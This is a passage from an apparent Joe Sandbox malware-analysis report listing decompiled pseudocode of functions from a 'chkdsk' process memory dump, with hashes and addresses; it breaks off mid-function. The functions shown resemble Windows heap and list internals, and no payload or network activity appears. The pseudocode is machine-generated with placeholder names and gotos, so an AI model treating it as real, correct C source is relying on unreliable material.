                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 503bbfba1cbabf56c7ea9d85a540e4d4833ae7854765ca5456e718071e9e7e3d
                                                      • Instruction ID: 4b4c6f695e19d212834eb2ec5d59c1360046588715ec2d722fccfb6b743d48a9
                                                      • Opcode Fuzzy Hash: 503bbfba1cbabf56c7ea9d85a540e4d4833ae7854765ca5456e718071e9e7e3d
                                                      • Instruction Fuzzy Hash: 40215B70640602CFD715EF66D004A24BBF1FF9532AB2092AEC106DB3A4D735A881CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E046A7 Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E04E046A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E04DCF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E04DBD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L04DA77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                      0x04e046b7
                                                      0x04e046ba
                                                      0x04e046c5
                                                      0x04e046c8
                                                      0x04e046d0
                                                      0x04e046d4
                                                      0x04e046e6
                                                      0x04e046e9
                                                      0x04e046f4
                                                      0x04e046ff
                                                      0x04e04705
                                                      0x04e04706
                                                      0x04e0470c
                                                      0x04e04713
                                                      0x04e0471b
                                                      0x04e04723
                                                      0x04e04725
                                                      0x04e046d6
                                                      0x04e046d9
                                                      0x04e046db
                                                      0x04e046db
                                                      0x04e04732

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                      • Instruction ID: d42db0e03a14f294337db1b708ea7acf7ac8c2436dc5ffa30cfe3f45e5a095ea
                                                      • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                      • Instruction Fuzzy Hash: 9A114872A04208BFDB059F5CD9808BEB7B9EF95304F1080AEF984C7390DA31AD51D7A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DB2397 Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 34%
                                                      			E04DB2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x4e7848c != 0) {
					L04DAFAD0(0x4e78610);
					if( *0x4e7848c == 0) {
						E04DAFA00(0x4e78610, _t19, _t27, 0x4e78610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E04DB2581(0x4e78610, 0x4d650a0, _t26, _t27, _t28);
						E04DAFA00(0x4e78610, 0x4d650a0, _t27, 0x4e78610);
					}
				} else {
					L1:
					_t11 =  *0x4e78614; // 0x1
					if(_t11 == 0) {
						_t11 = E04DC4886(0x4d61088, 1, 0x4e78614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E04DB2581(0x4e78610, (_t11 << 4) + 0x4d65070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                      0x04db23b0
                                                      0x04db23b6
                                                      0x04db2409
                                                      0x04db2415
                                                      0x04df5ae9
                                                      0x00000000
                                                      0x04db241b
                                                      0x04db241b
                                                      0x04db241d
                                                      0x04db2427
                                                      0x04db242e
                                                      0x04db2430
                                                      0x04db2430
                                                      0x04db23b8
                                                      0x04db23b8
                                                      0x04db23b8
                                                      0x04db23bf
                                                      0x04db23fc
                                                      0x04db23fc
                                                      0x04db23c1
                                                      0x04db23c3
                                                      0x04db23d0
                                                      0x04db23d8
                                                      0x04db23d8
                                                      0x04db23dc
                                                      0x04db23de
                                                      0x04db23e1
                                                      0x04db23e1
                                                      0x04db23ec

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a9047cc8b0c9c1e2f52844c30f0d629421d3691c92e2b3ba1f864848ea88596b
                                                      • Instruction ID: 330e4fd2b96b51495dc3b46cbad33f263da4b0aeb94855da7dd436e1a4397435
                                                      • Opcode Fuzzy Hash: a9047cc8b0c9c1e2f52844c30f0d629421d3691c92e2b3ba1f864848ea88596b
                                                      • Instruction Fuzzy Hash: 76110833744300A7FB30AA2AAC9CB95B2D8FB60734F14489EE643A7351D5B4F84086A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC37F5 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E04DC37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E04DA2280(_t6, 0x4e78550);
				}
				_t29 = E04DC387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E04D9FFB0(0x4e78550, _t27, 0x4e78550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                      0x04dc37fa
                                                      0x04dc37fc
                                                      0x04dc3805
                                                      0x04dc3808
                                                      0x04dc3808
                                                      0x04dc3814
                                                      0x04dc3818
                                                      0x04dc3846
                                                      0x04dc3848
                                                      0x04dc384b
                                                      0x04dc384b
                                                      0x04dc3852
                                                      0x00000000
                                                      0x04dc3854
                                                      0x04dc3856
                                                      0x00000000
                                                      0x00000000
                                                      0x04dc3863
                                                      0x00000000
                                                      0x04dc3863
                                                      0x04dc381a
                                                      0x04dc381a
                                                      0x04dc381f
                                                      0x04dc386e
                                                      0x04dc386e
                                                      0x04dc3871
                                                      0x04dc3873
                                                      0x04dc3873
                                                      0x04dc3868
                                                      0x00000000
                                                      0x04dc3868
                                                      0x04dc3821
                                                      0x04dc3826
                                                      0x00000000
                                                      0x00000000
                                                      0x04dc3828
                                                      0x04dc382a
                                                      0x04dc3841
                                                      0x00000000
                                                      0x04dc3841

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9451cbec9bf9e362da9270790e7b889b5a6efef217942591d2e425ff2aed61d3
                                                      • Instruction ID: 48268775b140fa950ba1a659271e7280aa5adb6e65287a349b83a91c389ea7b0
                                                      • Opcode Fuzzy Hash: 9451cbec9bf9e362da9270790e7b889b5a6efef217942591d2e425ff2aed61d3
                                                      • Instruction Fuzzy Hash: D901D672A016129BD3378F5A9940E26BBB6EF86B60715806DED498B314D730FC01C7E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D8C962 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 42%
                                                      			E04D8C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x4e7d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E04D9EEF0(0x4e770a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E04E0F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E04D9EB70(_t29, 0x4e770a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E04DCB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E04E0F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x4e770c0; // 0x0
					while(_t38 != 0x4e770c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x4e7b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                      0x04d8c96a
                                                      0x04d8c974
                                                      0x04d8c988
                                                      0x04d8c98a
                                                      0x04df7c9d
                                                      0x04df7c9f
                                                      0x04df7ca4
                                                      0x04df7cae
                                                      0x04df7cf0
                                                      0x04df7cf5
                                                      0x04df7cfa
                                                      0x04d8c992
                                                      0x04d8c996
                                                      0x04d8c997
                                                      0x04d8c998
                                                      0x04d8c9a3
                                                      0x04d8c9a3
                                                      0x04df7cb0
                                                      0x04df7cb7
                                                      0x04df7cbb
                                                      0x00000000
                                                      0x00000000
                                                      0x04df7cbd
                                                      0x04df7ce8
                                                      0x04df7cc5
                                                      0x04df7cc8
                                                      0x04df7cca
                                                      0x04df7cd0
                                                      0x04df7cd6
                                                      0x04df7cde
                                                      0x04df7ce4
                                                      0x04df7ce4
                                                      0x04df7cd0
                                                      0x00000000
                                                      0x04df7ce8
                                                      0x04d8c990
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d60810df9e2400cb3d65ad72aa3adce7dbe16c9112d380e5104f9835182a9f4
                                                      • Instruction ID: 795bf05a3465bae15f09af5c52f905cdeb1eb83442195062518fe2baa6e738bf
                                                      • Opcode Fuzzy Hash: 4d60810df9e2400cb3d65ad72aa3adce7dbe16c9112d380e5104f9835182a9f4
                                                      • Instruction Fuzzy Hash: B111E5313006469BDB20EF69DC45AABB7E5FB84629F010529E98597690EB20FC54CBE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DB002D Relevance: .1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04DB002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E04DA7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E04DA7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E04DA7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E04DA7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                      0x04db0032
                                                      0x04db0037
                                                      0x04db0043
                                                      0x04df4b3a
                                                      0x04db0049
                                                      0x04db0049
                                                      0x04db0049
                                                      0x04db004e
                                                      0x04db0053
                                                      0x04df4b48
                                                      0x04df4b5a
                                                      0x04df4b4a
                                                      0x04df4b53
                                                      0x04df4b53
                                                      0x04df4b5f
                                                      0x00000000
                                                      0x04df4b61
                                                      0x00000000
                                                      0x04df4b61
                                                      0x04db0059
                                                      0x04db0059
                                                      0x04db0060
                                                      0x04df4b6f
                                                      0x04df4b6f
                                                      0x04db0069
                                                      0x04df4b83
                                                      0x00000000
                                                      0x00000000
                                                      0x04df4b90
                                                      0x04df4b9b
                                                      0x04df4b9b
                                                      0x04df4ba4
                                                      0x00000000
                                                      0x00000000
                                                      0x04df4baa
                                                      0x00000000
                                                      0x04db006f
                                                      0x04db006f
                                                      0x00000000
                                                      0x04db006f
                                                      0x04db0069

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                      • Instruction ID: 2905cee621fd57ad096fac4850dcd0fa14842e070e011beb350b7c805cd016d5
                                                      • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                      • Instruction Fuzzy Hash: 10118232715A81CFE7239B24CD54B777794FB51758F0A00A1DE458B693E768F841C6A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D9766D Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E04D9766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E04DBF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E04DBF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04DA4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                      0x04d97672
                                                      0x04d9767f
                                                      0x04d97689
                                                      0x04d976de
                                                      0x04d976de
                                                      0x04d9768b
                                                      0x04d97691
                                                      0x04d97693
                                                      0x04d97697
                                                      0x00000000
                                                      0x04d97699
                                                      0x04d976a8
                                                      0x00000000
                                                      0x04d976aa
                                                      0x04d976ad
                                                      0x04d976b1
                                                      0x00000000
                                                      0x04d976b3
                                                      0x04d976b3
                                                      0x04d976b5
                                                      0x04d976ba
                                                      0x04d976bc
                                                      0x04d976bc
                                                      0x04d976c0
                                                      0x00000000
                                                      0x04d976c2
                                                      0x04d976ce
                                                      0x04d976ce
                                                      0x04d976c0
                                                      0x04d976b1
                                                      0x04d976a8
                                                      0x04d97697
                                                      0x04d976d9

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                      • Instruction ID: cbda468ad5cac829b9e6007acea21068fa2c469c45ee3ebfafef90986719e347
                                                      • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                      • Instruction Fuzzy Hash: AF018832710219EFDB61EE5ECC41E9B77EDEB84B60F150624B949CB250DA30ED0187B0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E1C450 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 46%
                                                      			E04E1C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04DC9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E04DC95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E04DC95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E04DC95D0();
				return L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                      0x04e1c458
                                                      0x04e1c45d
                                                      0x04e1c466
                                                      0x04e1c468
                                                      0x04e1c469
                                                      0x04e1c46a
                                                      0x04e1c46b
                                                      0x04e1c46e
                                                      0x04e1c46f
                                                      0x04e1c471
                                                      0x04e1c476
                                                      0x04e1c476
                                                      0x04e1c47c
                                                      0x04e1c47e
                                                      0x04e1c480
                                                      0x04e1c480
                                                      0x04e1c483
                                                      0x04e1c484
                                                      0x04e1c486
                                                      0x04e1c488
                                                      0x04e1c48f
                                                      0x04e1c491
                                                      0x04e1c493
                                                      0x04e1c493
                                                      0x04e1c48f
                                                      0x04e1c498
                                                      0x04e1c49e
                                                      0x04e1c4ad
                                                      0x04e1c4ad
                                                      0x04e1c4b2
                                                      0x04e1c4b4
                                                      0x04e1c4cd

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                      • Instruction ID: 09f877353b1d44f90ba3b7228c96204d564a068402d7a7200997f490482d2087
                                                      • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                      • Instruction Fuzzy Hash: 000180B2280506FFE721AF65CC94E62BB6DFB54398F104529F21483560CB31FCA0CAB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D89080 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 69%
                                                      			E04D89080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x4e785ec;
				E04DA2280(_t48, 0x4e785ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E04D9FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x4e7538c; // 0x776f6888
					if( *_t84 != 0x4e75388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x4e5f6e8);
						E04DDD0E8(0x4e785ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E04E588F5(_t80, _t85, 0x4e75388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x4e786c0; // 0x3007b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x4e786b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04DA2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E04E588F5(0x4e785ec, _t85, 0x4e75388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E04DCAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x4e7b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x4e784c0;
																			if(_t82 >=  *0x4e784c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04E59063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E04D8922A(_t99);
										_t64 = E04DA7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04E58B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x4e786c0; // 0x3007b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x4e786b8; // 0x0
												if(__eflags == 0) {
